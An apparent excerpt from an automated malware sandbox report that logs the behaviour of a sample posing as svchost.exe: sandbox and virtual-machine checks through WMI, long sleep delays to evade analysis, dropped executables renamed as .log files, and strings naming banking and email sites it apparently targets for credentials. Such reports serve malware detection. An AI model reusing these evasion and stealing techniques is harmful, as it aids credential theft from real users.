Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\comref\svchost.exe Memory allocated: D20000 memory reserve | memory write watch Jump to behavior
Source: C:\comref\svchost.exe Memory allocated: 1A8A0000 memory reserve | memory write watch Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599750 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 3600000 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 598561 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597401 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596375 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595938 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593359 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 592766 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 592469 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591984 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591125 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 590837 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 590500 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 589375 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588969 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588219 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587984 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587766 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587016 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 586625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 586141 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 585560 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 584531 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 584045 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 583672 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 583141 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 582922 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 582438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581906 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581563 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581297 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 580813 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 580438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579844 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579453 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579078 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578813 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578266 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578110 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577995 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577886 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577767 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577525 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577421 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577310 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577203 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577093 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 576984 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\comref\svchost.exe Window / User API: threadDelayed 7901 Jump to behavior
Source: C:\comref\svchost.exe Window / User API: threadDelayed 1484 Jump to behavior
Source: C:\comref\svchost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LMrHnriI.log Jump to dropped file
Source: C:\comref\svchost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ThQetCXk.log Jump to dropped file
Source: C:\comref\svchost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ApTjSBhc.log Jump to dropped file
Source: C:\comref\svchost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eVuUdNSS.log Jump to dropped file
Source: C:\comref\svchost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jIMTFKhG.log Jump to dropped file
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\comref\svchost.exe TID: 1204 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -599750s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -599469s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 3840 Thread sleep time: -32400000s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -598561s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -597891s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -597401s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -597250s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -597016s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -596375s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -596188s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -595938s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -595641s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -595438s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -595078s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -594266s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -593953s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -593625s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -593359s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -592766s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -592469s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -591984s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -591625s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -591125s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -590837s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -590500s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -589375s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -588969s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -588641s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -588219s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -587984s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -587766s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -587016s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -586625s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -586141s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -585560s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -584531s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -584045s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -583672s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -583141s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -582922s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -582438s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -581906s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -581563s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -581297s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -580813s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -580438s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -579844s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -579453s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -579078s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -578813s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -578266s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -578110s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577995s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577886s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577767s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577641s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577525s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577421s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577310s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577203s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -577093s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe TID: 1456 Thread sleep time: -576984s >= -30000s Jump to behavior
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\comref\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_002EA69B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_002FC220
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_0030B348 FindFirstFileExA, 0_2_0030B348
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FE6A3 VirtualQuery,GetSystemInfo, 0_2_002FE6A3
Source: C:\comref\svchost.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599750 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 3600000 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 598561 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597401 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 597016 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596375 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 596188 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595938 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 593359 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 592766 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 592469 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591984 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 591125 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 590837 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 590500 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 589375 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588969 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 588219 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587984 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587766 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 587016 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 586625 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 586141 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 585560 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 584531 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 584045 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 583672 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 583141 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 582922 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 582438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581906 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581563 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 581297 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 580813 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 580438 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579844 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579453 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 579078 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578813 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578266 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 578110 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577995 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577886 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577767 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577641 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577525 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577421 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577310 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577203 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 577093 Jump to behavior
Source: C:\comref\svchost.exe Thread delayed: delay time: 576984 Jump to behavior
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: NWrxbOzSkS.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: NWrxbOzSkS.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: NWrxbOzSkS.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: ugRGgCJhQl.exe, 00000000.00000003.1237481545.00000000026D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: NWrxbOzSkS.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: NWrxbOzSkS.14.dr Binary or memory string: discord.comVMware20,11696492231f
Source: svchost.exe, 0000000E.00000002.3917020258.000000001C585000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NWrxbOzSkS.14.dr Binary or memory string: global block list test formVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: NWrxbOzSkS.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
